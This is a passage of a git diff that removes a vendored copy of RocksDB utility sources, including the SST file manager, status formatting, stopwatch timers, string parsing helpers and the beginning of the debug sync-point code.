-Status SstFileManagerImpl::OnMoveFile(const std::string& old_path,
-                                      const std::string& new_path,
-                                      uint64_t* file_size) {
-  {
-    MutexLock l(&mu_);
-    if (file_size != nullptr) {
-      *file_size = tracked_files_[old_path];
-    }
-    OnAddFileImpl(new_path, tracked_files_[old_path]);
-    OnDeleteFileImpl(old_path);
-  }
-  TEST_SYNC_POINT("SstFileManagerImpl::OnMoveFile");
-  return Status::OK();
-}
-
-void SstFileManagerImpl::SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) {
-  MutexLock l(&mu_);
-  max_allowed_space_ = max_allowed_space;
-}
-
-bool SstFileManagerImpl::IsMaxAllowedSpaceReached() {
-  MutexLock l(&mu_);
-  if (max_allowed_space_ <= 0) {
-    return false;
-  }
-  return total_files_size_ >= max_allowed_space_;
-}
-
-uint64_t SstFileManagerImpl::GetTotalSize() {
-  MutexLock l(&mu_);
-  return total_files_size_;
-}
-
-std::unordered_map<std::string, uint64_t>
-SstFileManagerImpl::GetTrackedFiles() {
-  MutexLock l(&mu_);
-  return tracked_files_;
-}
-
-int64_t SstFileManagerImpl::GetDeleteRateBytesPerSecond() {
-  return delete_scheduler_.GetRateBytesPerSecond();
-}
-
-void SstFileManagerImpl::SetDeleteRateBytesPerSecond(int64_t delete_rate) {
-  return delete_scheduler_.SetRateBytesPerSecond(delete_rate);
-}
-
-Status SstFileManagerImpl::ScheduleFileDeletion(const std::string& file_path) {
-  return delete_scheduler_.DeleteFile(file_path);
-}
-
-void SstFileManagerImpl::WaitForEmptyTrash() {
-  delete_scheduler_.WaitForEmptyTrash();
-}
-
-void SstFileManagerImpl::OnAddFileImpl(const std::string& file_path,
-                                       uint64_t file_size) {
-  auto tracked_file = tracked_files_.find(file_path);
-  if (tracked_file != tracked_files_.end()) {
-    // File was added before, we will just update the size
-    total_files_size_ -= tracked_file->second;
-    total_files_size_ += file_size;
-  } else {
-    total_files_size_ += file_size;
-  }
-  tracked_files_[file_path] = file_size;
-}
-
-void SstFileManagerImpl::OnDeleteFileImpl(const std::string& file_path) {
-  auto tracked_file = tracked_files_.find(file_path);
-  if (tracked_file == tracked_files_.end()) {
-    // File is not tracked
-    return;
-  }
-
-  total_files_size_ -= tracked_file->second;
-  tracked_files_.erase(tracked_file);
-}
-
-SstFileManager* NewSstFileManager(Env* env, std::shared_ptr<Logger> info_log,
-                                  std::string trash_dir,
-                                  int64_t rate_bytes_per_sec,
-                                  bool delete_existing_trash, Status* status) {
-  SstFileManagerImpl* res =
-      new SstFileManagerImpl(env, info_log, trash_dir, rate_bytes_per_sec);
-
-  Status s;
-  if (trash_dir != "") {
-    s = env->CreateDirIfMissing(trash_dir);
-    if (s.ok() && delete_existing_trash) {
-      std::vector<std::string> files_in_trash;
-      s = env->GetChildren(trash_dir, &files_in_trash);
-      if (s.ok()) {
-        for (const std::string& trash_file : files_in_trash) {
-          if (trash_file == "." || trash_file == "..") {
-            continue;
-          }
-
-          std::string path_in_trash = trash_dir + "/" + trash_file;
-          res->OnAddFile(path_in_trash);
-          Status file_delete = res->ScheduleFileDeletion(path_in_trash);
-          if (s.ok() && !file_delete.ok()) {
-            s = file_delete;
-          }
-        }
-      }
-    }
-  }
-
-  if (status) {
-    *status = s;
-  }
-
-  return res;
-}
-
-#else
-
-SstFileManager* NewSstFileManager(Env* env, std::shared_ptr<Logger> info_log,
-                                  std::string trash_dir,
-                                  int64_t rate_bytes_per_sec,
-                                  bool delete_existing_trash, Status* status) {
-  if (status) {
-    *status =
-        Status::NotSupported("SstFileManager is not supported in ROCKSDB_LITE");
-  }
-  return nullptr;
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
diff --git a/thirdparty/rocksdb/util/sst_file_manager_impl.h b/thirdparty/rocksdb/util/sst_file_manager_impl.h
deleted file mode 100644
index b737bf7..0000000
--- a/thirdparty/rocksdb/util/sst_file_manager_impl.h
+++ /dev/null
@@ -1,105 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "port/port.h"
-
-#include "rocksdb/sst_file_manager.h"
-#include "util/delete_scheduler.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-
-// SstFileManager is used to track SST files in the DB and control there
-// deletion rate.
-// All SstFileManager public functions are thread-safe.
-class SstFileManagerImpl : public SstFileManager {
- public:
-  explicit SstFileManagerImpl(Env* env, std::shared_ptr<Logger> logger,
-                              const std::string& trash_dir,
-                              int64_t rate_bytes_per_sec);
-
-  ~SstFileManagerImpl();
-
-  // DB will call OnAddFile whenever a new sst file is added.
-  Status OnAddFile(const std::string& file_path);
-
-  // DB will call OnDeleteFile whenever an sst file is deleted.
-  Status OnDeleteFile(const std::string& file_path);
-
-  // DB will call OnMoveFile whenever an sst file is move to a new path.
-  Status OnMoveFile(const std::string& old_path, const std::string& new_path,
-                    uint64_t* file_size = nullptr);
-
-  // Update the maximum allowed space that should be used by RocksDB, if
-  // the total size of the SST files exceeds max_allowed_space, writes to
-  // RocksDB will fail.
-  //
-  // Setting max_allowed_space to 0 will disable this feature, maximum allowed
-  // space will be infinite (Default value).
-  //
-  // thread-safe.
-  void SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) override;
-
-  // Return true if the total size of SST files exceeded the maximum allowed
-  // space usage.
-  //
-  // thread-safe.
-  bool IsMaxAllowedSpaceReached() override;
-
-  // Return the total size of all tracked files.
-  uint64_t GetTotalSize() override;
-
-  // Return a map containing all tracked files and there corresponding sizes.
-  std::unordered_map<std::string, uint64_t> GetTrackedFiles() override;
-
-  // Return delete rate limit in bytes per second.
-  virtual int64_t GetDeleteRateBytesPerSecond() override;
-
-  // Update the delete rate limit in bytes per second.
-  virtual void SetDeleteRateBytesPerSecond(int64_t delete_rate) override;
-
-  // Move file to trash directory and schedule it's deletion.
-  virtual Status ScheduleFileDeletion(const std::string& file_path);
-
-  // Wait for all files being deleteing in the background to finish or for
-  // destructor to be called.
-  virtual void WaitForEmptyTrash();
-
-  DeleteScheduler* delete_scheduler() { return &delete_scheduler_; }
-
- private:
-  // REQUIRES: mutex locked
-  void OnAddFileImpl(const std::string& file_path, uint64_t file_size);
-  // REQUIRES: mutex locked
-  void OnDeleteFileImpl(const std::string& file_path);
-
-  Env* env_;
-  std::shared_ptr<Logger> logger_;
-  // Mutex to protect tracked_files_, total_files_size_
-  port::Mutex mu_;
-  // The summation of the sizes of all files in tracked_files_ map
-  uint64_t total_files_size_;
-  // A map containing all tracked files and there sizes
-  //  file_path => file_size
-  std::unordered_map<std::string, uint64_t> tracked_files_;
-  // The maximum allowed space (in bytes) for sst files.
-  uint64_t max_allowed_space_;
-  // DeleteScheduler used to throttle file deletition, if SstFileManagerImpl was
-  // created with rate_bytes_per_sec == 0 or trash_dir == "", delete_scheduler_
-  // rate limiting will be disabled and will simply delete the files.
-  DeleteScheduler delete_scheduler_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/status.cc b/thirdparty/rocksdb/util/status.cc
deleted file mode 100644
index e0c1af9..0000000
--- a/thirdparty/rocksdb/util/status.cc
+++ /dev/null
@@ -1,106 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/status.h"
-#include <stdio.h>
-#include <cstring>
-#include "port/port.h"
-
-namespace rocksdb {
-
-const char* Status::CopyState(const char* state) {
-  char* const result =
-      new char[std::strlen(state) + 1];  // +1 for the null terminator
-  std::strcpy(result, state);
-  return result;
-}
-
-Status::Status(Code _code, SubCode _subcode, const Slice& msg, const Slice& msg2)
-    : code_(_code), subcode_(_subcode) {
-  assert(code_ != kOk);
-  assert(subcode_ != kMaxSubCode);
-  const size_t len1 = msg.size();
-  const size_t len2 = msg2.size();
-  const size_t size = len1 + (len2 ? (2 + len2) : 0);
-  char* const result = new char[size + 1];  // +1 for null terminator
-  memcpy(result, msg.data(), len1);
-  if (len2) {
-    result[len1] = ':';
-    result[len1 + 1] = ' ';
-    memcpy(result + len1 + 2, msg2.data(), len2);
-  }
-  result[size] = '\0';  // null terminator for C style string
-  state_ = result;
-}
-
-std::string Status::ToString() const {
-  char tmp[30];
-  const char* type;
-  switch (code_) {
-    case kOk:
-      return "OK";
-    case kNotFound:
-      type = "NotFound: ";
-      break;
-    case kCorruption:
-      type = "Corruption: ";
-      break;
-    case kNotSupported:
-      type = "Not implemented: ";
-      break;
-    case kInvalidArgument:
-      type = "Invalid argument: ";
-      break;
-    case kIOError:
-      type = "IO error: ";
-      break;
-    case kMergeInProgress:
-      type = "Merge in progress: ";
-      break;
-    case kIncomplete:
-      type = "Result incomplete: ";
-      break;
-    case kShutdownInProgress:
-      type = "Shutdown in progress: ";
-      break;
-    case kTimedOut:
-      type = "Operation timed out: ";
-      break;
-    case kAborted:
-      type = "Operation aborted: ";
-      break;
-    case kBusy:
-      type = "Resource busy: ";
-      break;
-    case kExpired:
-      type = "Operation expired: ";
-      break;
-    case kTryAgain:
-      type = "Operation failed. Try again.: ";
-      break;
-    default:
-      snprintf(tmp, sizeof(tmp), "Unknown code(%d): ",
-               static_cast<int>(code()));
-      type = tmp;
-      break;
-  }
-  std::string result(type);
-  if (subcode_ != kNone) {
-    uint32_t index = static_cast<int32_t>(subcode_);
-    assert(sizeof(msgs) > index);
-    result.append(msgs[index]);
-  }
-
-  if (state_ != nullptr) {
-    result.append(state_);
-  }
-  return result;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/status_message.cc b/thirdparty/rocksdb/util/status_message.cc
deleted file mode 100644
index 6e9d4e4..0000000
--- a/thirdparty/rocksdb/util/status_message.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-const char* Status::msgs[] = {
-    "",                                                   // kNone
-    "Timeout Acquiring Mutex",                            // kMutexTimeout
-    "Timeout waiting to lock key",                        // kLockTimeout
-    "Failed to acquire lock due to max_num_locks limit",  // kLockLimit
-    "No space left on device",                            // kNoSpace
-    "Deadlock",                                           // kDeadlock
-    "Stale file handle",                                  // kStaleFile
-    "Memory limit reached"                                // kMemoryLimit
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/stderr_logger.h b/thirdparty/rocksdb/util/stderr_logger.h
deleted file mode 100644
index 8612fce..0000000
--- a/thirdparty/rocksdb/util/stderr_logger.h
+++ /dev/null
@@ -1,31 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdarg.h>
-#include <stdio.h>
-
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-// Prints logs to stderr for faster debugging
-class StderrLogger : public Logger {
- public:
-  explicit StderrLogger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : Logger(log_level) {}
-
-  // Brings overloaded Logv()s into scope so they're not hidden when we override
-  // a subset of them.
-  using Logger::Logv;
-
-  virtual void Logv(const char* format, va_list ap) override {
-    vfprintf(stderr, format, ap);
-    fprintf(stderr, "\n");
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/stop_watch.h b/thirdparty/rocksdb/util/stop_watch.h
deleted file mode 100644
index 89be103..0000000
--- a/thirdparty/rocksdb/util/stop_watch.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-// Auto-scoped.
-// Records the measure time into the corresponding histogram if statistics
-// is not nullptr. It is also saved into *elapsed if the pointer is not nullptr
-// and overwrite is true, it will be added to *elapsed if overwrite is false.
-class StopWatch {
- public:
-  StopWatch(Env* const env, Statistics* statistics, const uint32_t hist_type,
-            uint64_t* elapsed = nullptr, bool overwrite = true)
-      : env_(env),
-        statistics_(statistics),
-        hist_type_(hist_type),
-        elapsed_(elapsed),
-        overwrite_(overwrite),
-        stats_enabled_(statistics && statistics->HistEnabledForType(hist_type)),
-        start_time_((stats_enabled_ || elapsed != nullptr) ? env->NowMicros()
-                                                           : 0) {}
-
-  ~StopWatch() {
-    if (elapsed_) {
-      if (overwrite_) {
-        *elapsed_ = env_->NowMicros() - start_time_;
-      } else {
-        *elapsed_ += env_->NowMicros() - start_time_;
-      }
-    }
-    if (stats_enabled_) {
-      statistics_->measureTime(hist_type_,
-          (elapsed_ != nullptr) ? *elapsed_ :
-                                  (env_->NowMicros() - start_time_));
-    }
-  }
-
-  uint64_t start_time() const { return start_time_; }
-
- private:
-  Env* const env_;
-  Statistics* statistics_;
-  const uint32_t hist_type_;
-  uint64_t* elapsed_;
-  bool overwrite_;
-  bool stats_enabled_;
-  const uint64_t start_time_;
-};
-
-// a nano second precision stopwatch
-class StopWatchNano {
- public:
-  explicit StopWatchNano(Env* const env, bool auto_start = false)
-      : env_(env), start_(0) {
-    if (auto_start) {
-      Start();
-    }
-  }
-
-  void Start() { start_ = env_->NowNanos(); }
-
-  uint64_t ElapsedNanos(bool reset = false) {
-    auto now = env_->NowNanos();
-    auto elapsed = now - start_;
-    if (reset) {
-      start_ = now;
-    }
-    return elapsed;
-  }
-
-  uint64_t ElapsedNanosSafe(bool reset = false) {
-    return (env_ != nullptr) ? ElapsedNanos(reset) : 0U;
-  }
-
- private:
-  Env* const env_;
-  uint64_t start_;
-};
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/string_util.cc b/thirdparty/rocksdb/util/string_util.cc
deleted file mode 100644
index a37605a..0000000
--- a/thirdparty/rocksdb/util/string_util.cc
+++ /dev/null
@@ -1,368 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/string_util.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <errno.h>
-#include <inttypes.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <cmath>
-#include <sstream>
-#include <string>
-#include <utility>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-const std::string kNullptrString = "nullptr";
-
-std::vector<std::string> StringSplit(const std::string& arg, char delim) {
-  std::vector<std::string> splits;
-  std::stringstream ss(arg);
-  std::string item;
-  while (std::getline(ss, item, delim)) {
-    splits.push_back(item);
-  }
-  return splits;
-}
-
-// for micros < 10ms, print "XX us".
-// for micros < 10sec, print "XX ms".
-// for micros >= 10 sec, print "XX sec".
-// for micros <= 1 hour, print Y:X M:S".
-// for micros > 1 hour, print Z:Y:X H:M:S".
-int AppendHumanMicros(uint64_t micros, char* output, int len,
-                      bool fixed_format) {
-  if (micros < 10000 && !fixed_format) {
-    return snprintf(output, len, "%" PRIu64 " us", micros);
-  } else if (micros < 10000000 && !fixed_format) {
-    return snprintf(output, len, "%.3lf ms",
-                    static_cast<double>(micros) / 1000);
-  } else if (micros < 1000000l * 60 && !fixed_format) {
-    return snprintf(output, len, "%.3lf sec",
-                    static_cast<double>(micros) / 1000000);
-  } else if (micros < 1000000ll * 60 * 60 && !fixed_format) {
-    return snprintf(output, len, "%02" PRIu64 ":%05.3f M:S",
-                    micros / 1000000 / 60,
-                    static_cast<double>(micros % 60000000) / 1000000);
-  } else {
-    return snprintf(output, len, "%02" PRIu64 ":%02" PRIu64 ":%05.3f H:M:S",
-                    micros / 1000000 / 3600, (micros / 1000000 / 60) % 60,
-                    static_cast<double>(micros % 60000000) / 1000000);
-  }
-}
-
-// for sizes >=10TB, print "XXTB"
-// for sizes >=10GB, print "XXGB"
-// etc.
-// append file size summary to output and return the len
-int AppendHumanBytes(uint64_t bytes, char* output, int len) {
-  const uint64_t ull10 = 10;
-  if (bytes >= ull10 << 40) {
-    return snprintf(output, len, "%" PRIu64 "TB", bytes >> 40);
-  } else if (bytes >= ull10 << 30) {
-    return snprintf(output, len, "%" PRIu64 "GB", bytes >> 30);
-  } else if (bytes >= ull10 << 20) {
-    return snprintf(output, len, "%" PRIu64 "MB", bytes >> 20);
-  } else if (bytes >= ull10 << 10) {
-    return snprintf(output, len, "%" PRIu64 "KB", bytes >> 10);
-  } else {
-    return snprintf(output, len, "%" PRIu64 "B", bytes);
-  }
-}
-
-void AppendNumberTo(std::string* str, uint64_t num) {
-  char buf[30];
-  snprintf(buf, sizeof(buf), "%" PRIu64, num);
-  str->append(buf);
-}
-
-void AppendEscapedStringTo(std::string* str, const Slice& value) {
-  for (size_t i = 0; i < value.size(); i++) {
-    char c = value[i];
-    if (c >= ' ' && c <= '~') {
-      str->push_back(c);
-    } else {
-      char buf[10];
-      snprintf(buf, sizeof(buf), "\\x%02x",
-               static_cast<unsigned int>(c) & 0xff);
-      str->append(buf);
-    }
-  }
-}
-
-std::string NumberToString(uint64_t num) {
-  std::string r;
-  AppendNumberTo(&r, num);
-  return r;
-}
-
-std::string NumberToHumanString(int64_t num) {
-  char buf[19];
-  int64_t absnum = num < 0 ? -num : num;
-  if (absnum < 10000) {
-    snprintf(buf, sizeof(buf), "%" PRIi64, num);
-  } else if (absnum < 10000000) {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "K", num / 1000);
-  } else if (absnum < 10000000000LL) {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "M", num / 1000000);
-  } else {
-    snprintf(buf, sizeof(buf), "%" PRIi64 "G", num / 1000000000);
-  }
-  return std::string(buf);
-}
-
-std::string BytesToHumanString(uint64_t bytes) {
-  const char* size_name[] = {"KB", "MB", "GB", "TB"};
-  double final_size = static_cast<double>(bytes);
-  size_t size_idx;
-
-  // always start with KB
-  final_size /= 1024;
-  size_idx = 0;
-
-  while (size_idx < 3 && final_size >= 1024) {
-    final_size /= 1024;
-    size_idx++;
-  }
-
-  char buf[20];
-  snprintf(buf, sizeof(buf), "%.2f %s", final_size, size_name[size_idx]);
-  return std::string(buf);
-}
-
-std::string EscapeString(const Slice& value) {
-  std::string r;
-  AppendEscapedStringTo(&r, value);
-  return r;
-}
-
-bool ConsumeDecimalNumber(Slice* in, uint64_t* val) {
-  uint64_t v = 0;
-  int digits = 0;
-  while (!in->empty()) {
-    char c = (*in)[0];
-    if (c >= '0' && c <= '9') {
-      ++digits;
-      const unsigned int delta = (c - '0');
-      static const uint64_t kMaxUint64 = ~static_cast<uint64_t>(0);
-      if (v > kMaxUint64 / 10 ||
-          (v == kMaxUint64 / 10 && delta > kMaxUint64 % 10)) {
-        // Overflow
-        return false;
-      }
-      v = (v * 10) + delta;
-      in->remove_prefix(1);
-    } else {
-      break;
-    }
-  }
-  *val = v;
-  return (digits > 0);
-}
-
-bool isSpecialChar(const char c) {
-  if (c == '\\' || c == '#' || c == ':' || c == '\r' || c == '\n') {
-    return true;
-  }
-  return false;
-}
-
-namespace {
-using CharMap = std::pair<char, char>;
-}
-
-char UnescapeChar(const char c) {
-  static const CharMap convert_map[] = {{'r', '\r'}, {'n', '\n'}};
-
-  auto iter = std::find_if(std::begin(convert_map), std::end(convert_map),
-                           [c](const CharMap& p) { return p.first == c; });
-
-  if (iter == std::end(convert_map)) {
-    return c;
-  }
-  return iter->second;
-}
-
-char EscapeChar(const char c) {
-  static const CharMap convert_map[] = {{'\n', 'n'}, {'\r', 'r'}};
-
-  auto iter = std::find_if(std::begin(convert_map), std::end(convert_map),
-                           [c](const CharMap& p) { return p.first == c; });
-
-  if (iter == std::end(convert_map)) {
-    return c;
-  }
-  return iter->second;
-}
-
-std::string EscapeOptionString(const std::string& raw_string) {
-  std::string output;
-  for (auto c : raw_string) {
-    if (isSpecialChar(c)) {
-      output += '\\';
-      output += EscapeChar(c);
-    } else {
-      output += c;
-    }
-  }
-
-  return output;
-}
-
-std::string UnescapeOptionString(const std::string& escaped_string) {
-  bool escaped = false;
-  std::string output;
-
-  for (auto c : escaped_string) {
-    if (escaped) {
-      output += UnescapeChar(c);
-      escaped = false;
-    } else {
-      if (c == '\\') {
-        escaped = true;
-        continue;
-      }
-      output += c;
-    }
-  }
-  return output;
-}
-
-std::string trim(const std::string& str) {
-  if (str.empty()) return std::string();
-  size_t start = 0;
-  size_t end = str.size() - 1;
-  while (isspace(str[start]) != 0 && start <= end) {
-    ++start;
-  }
-  while (isspace(str[end]) != 0 && start <= end) {
-    --end;
-  }
-  if (start <= end) {
-    return str.substr(start, end - start + 1);
-  }
-  return std::string();
-}
-
-#ifndef ROCKSDB_LITE
-
-bool ParseBoolean(const std::string& type, const std::string& value) {
-  if (value == "true" || value == "1") {
-    return true;
-  } else if (value == "false" || value == "0") {
-    return false;
-  }
-  throw std::invalid_argument(type);
-}
-
-uint32_t ParseUint32(const std::string& value) {
-  uint64_t num = ParseUint64(value);
-  if ((num >> 32LL) == 0) {
-    return static_cast<uint32_t>(num);
-  } else {
-    throw std::out_of_range(value);
-  }
-}
-
-#endif
-
-uint64_t ParseUint64(const std::string& value) {
-  size_t endchar;
-#ifndef CYGWIN
-  uint64_t num = std::stoull(value.c_str(), &endchar);
-#else
-  char* endptr;
-  uint64_t num = std::strtoul(value.c_str(), &endptr, 0);
-  endchar = endptr - value.c_str();
-#endif
-
-  if (endchar < value.length()) {
-    char c = value[endchar];
-    if (c == 'k' || c == 'K')
-      num <<= 10LL;
-    else if (c == 'm' || c == 'M')
-      num <<= 20LL;
-    else if (c == 'g' || c == 'G')
-      num <<= 30LL;
-    else if (c == 't' || c == 'T')
-      num <<= 40LL;
-  }
-
-  return num;
-}
-
-int ParseInt(const std::string& value) {
-  size_t endchar;
-#ifndef CYGWIN
-  int num = std::stoi(value.c_str(), &endchar);
-#else
-  char* endptr;
-  int num = std::strtoul(value.c_str(), &endptr, 0);
-  endchar = endptr - value.c_str();
-#endif
-
-  if (endchar < value.length()) {
-    char c = value[endchar];
-    if (c == 'k' || c == 'K')
-      num <<= 10;
-    else if (c == 'm' || c == 'M')
-      num <<= 20;
-    else if (c == 'g' || c == 'G')
-      num <<= 30;
-  }
-
-  return num;
-}
-
-double ParseDouble(const std::string& value) {
-#ifndef CYGWIN
-  return std::stod(value);
-#else
-  return std::strtod(value.c_str(), 0);
-#endif
-}
-
-size_t ParseSizeT(const std::string& value) {
-  return static_cast<size_t>(ParseUint64(value));
-}
-
-std::vector<int> ParseVectorInt(const std::string& value) {
-  std::vector<int> result;
-  size_t start = 0;
-  while (start < value.size()) {
-    size_t end = value.find(':', start);
-    if (end == std::string::npos) {
-      result.push_back(ParseInt(value.substr(start)));
-      break;
-    } else {
-      result.push_back(ParseInt(value.substr(start, end - start)));
-      start = end + 1;
-    }
-  }
-  return result;
-}
-
-bool SerializeIntVector(const std::vector<int>& vec, std::string* value) {
-  *value = "";
-  for (size_t i = 0; i < vec.size(); ++i) {
-    if (i > 0) {
-      *value += ":";
-    }
-    *value += ToString(vec[i]);
-  }
-  return true;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/string_util.h b/thirdparty/rocksdb/util/string_util.h
deleted file mode 100644
index b2bca40..0000000
--- a/thirdparty/rocksdb/util/string_util.h
+++ /dev/null
@@ -1,128 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <sstream>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-
-extern std::vector<std::string> StringSplit(const std::string& arg, char delim);
-
-template <typename T>
-inline std::string ToString(T value) {
-#if !(defined OS_ANDROID) && !(defined CYGWIN) && !(defined OS_FREEBSD)
-  return std::to_string(value);
-#else
-  // Andorid or cygwin doesn't support all of C++11, std::to_string() being
-  // one of the not supported features.
-  std::ostringstream os;
-  os << value;
-  return os.str();
-#endif
-}
-
-// Append a human-readable printout of "num" to *str
-extern void AppendNumberTo(std::string* str, uint64_t num);
-
-// Append a human-readable printout of "value" to *str.
-// Escapes any non-printable characters found in "value".
-extern void AppendEscapedStringTo(std::string* str, const Slice& value);
-
-// Return a string printout of "num"
-extern std::string NumberToString(uint64_t num);
-
-// Return a human-readable version of num.
-// for num >= 10.000, prints "xxK"
-// for num >= 10.000.000, prints "xxM"
-// for num >= 10.000.000.000, prints "xxG"
-extern std::string NumberToHumanString(int64_t num);
-
-// Return a human-readable version of bytes
-// ex: 1048576 -> 1.00 GB
-extern std::string BytesToHumanString(uint64_t bytes);
-
-// Append a human-readable time in micros.
-int AppendHumanMicros(uint64_t micros, char* output, int len,
-                      bool fixed_format);
-
-// Append a human-readable size in bytes
-int AppendHumanBytes(uint64_t bytes, char* output, int len);
-
-// Return a human-readable version of "value".
-// Escapes any non-printable characters found in "value".
-extern std::string EscapeString(const Slice& value);
-
-// Parse a human-readable number from "*in" into *value.  On success,
-// advances "*in" past the consumed number and sets "*val" to the
-// numeric value.  Otherwise, returns false and leaves *in in an
-// unspecified state.
-extern bool ConsumeDecimalNumber(Slice* in, uint64_t* val);
-
-// Returns true if the input char "c" is considered as a special character
-// that will be escaped when EscapeOptionString() is called.
-//
-// @param c the input char
-// @return true if the input char "c" is considered as a special character.
-// @see EscapeOptionString
-bool isSpecialChar(const char c);
-
-// If the input char is an escaped char, it will return the its
-// associated raw-char.  Otherwise, the function will simply return
-// the original input char.
-char UnescapeChar(const char c);
-
-// If the input char is a control char, it will return the its
-// associated escaped char.  Otherwise, the function will simply return
-// the original input char.
-char EscapeChar(const char c);
-
-// Converts a raw string to an escaped string.  Escaped-characters are
-// defined via the isSpecialChar() function.  When a char in the input
-// string "raw_string" is classified as a special characters, then it
-// will be prefixed by '\' in the output.
-//
-// It's inverse function is UnescapeOptionString().
-// @param raw_string the input string
-// @return the '\' escaped string of the input "raw_string"
-// @see isSpecialChar, UnescapeOptionString
-std::string EscapeOptionString(const std::string& raw_string);
-
-// The inverse function of EscapeOptionString.  It converts
-// an '\' escaped string back to a raw string.
-//
-// @param escaped_string the input '\' escaped string
-// @return the raw string of the input "escaped_string"
-std::string UnescapeOptionString(const std::string& escaped_string);
-
-std::string trim(const std::string& str);
-
-#ifndef ROCKSDB_LITE
-bool ParseBoolean(const std::string& type, const std::string& value);
-
-uint32_t ParseUint32(const std::string& value);
-#endif
-
-uint64_t ParseUint64(const std::string& value);
-
-int ParseInt(const std::string& value);
-
-double ParseDouble(const std::string& value);
-
-size_t ParseSizeT(const std::string& value);
-
-std::vector<int> ParseVectorInt(const std::string& value);
-
-bool SerializeIntVector(const std::vector<int>& vec, std::string* value);
-
-extern const std::string kNullptrString;
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/sync_point.cc b/thirdparty/rocksdb/util/sync_point.cc
deleted file mode 100644
index c8c9fbc..0000000
--- a/thirdparty/rocksdb/util/sync_point.cc
+++ /dev/null
@@ -1,170 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/sync_point.h"
-#include <functional>
-#include <thread>
-#include "port/port.h"
-#include "util/random.h"
-
-int rocksdb_kill_odds = 0;
-std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-#ifndef NDEBUG
-namespace rocksdb {
-
-void TestKillRandom(std::string kill_point, int odds,
-                    const std::string& srcfile, int srcline) {
-  for (auto& p : rocksdb_kill_prefix_blacklist) {
-    if (kill_point.substr(0, p.length()) == p) {
-      return;
-    }
-  }
-
-  assert(odds > 0);
-  if (odds % 7 == 0) {
-    // class Random uses multiplier 16807, which is 7^5. If odds are
-    // multiplier of 7, there might be limited values generated.
-    odds++;
-  }
-  auto* r = Random::GetTLSInstance();
-  bool crash = r->OneIn(odds);
-  if (crash) {
-    port::Crash(srcfile, srcline);
-  }
-}
-
-SyncPoint* SyncPoint::GetInstance() {
-  static SyncPoint sync_point;
-  return &sync_point;
-}
-
-void SyncPoint::LoadDependency(const std::vector<SyncPointPair>& dependencies) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  successors_.clear();
-  predecessors_.clear();
-  cleared_points_.clear();
-  for (const auto& dependency : dependencies) {
-    successors_[dependency.predecessor].push_back(dependency.successor);
-    predecessors_[dependency.successor].push_back(dependency.predecessor);
-  }
-  cv_.notify_all();
-}
-
-void SyncPoint::LoadDependencyAndMarkers(
-    const std::vector<SyncPointPair>& dependencies,
-    const std::vector<SyncPointPair>& markers) {
-  std::unique_lock<std::mutex> lock(mutex_);
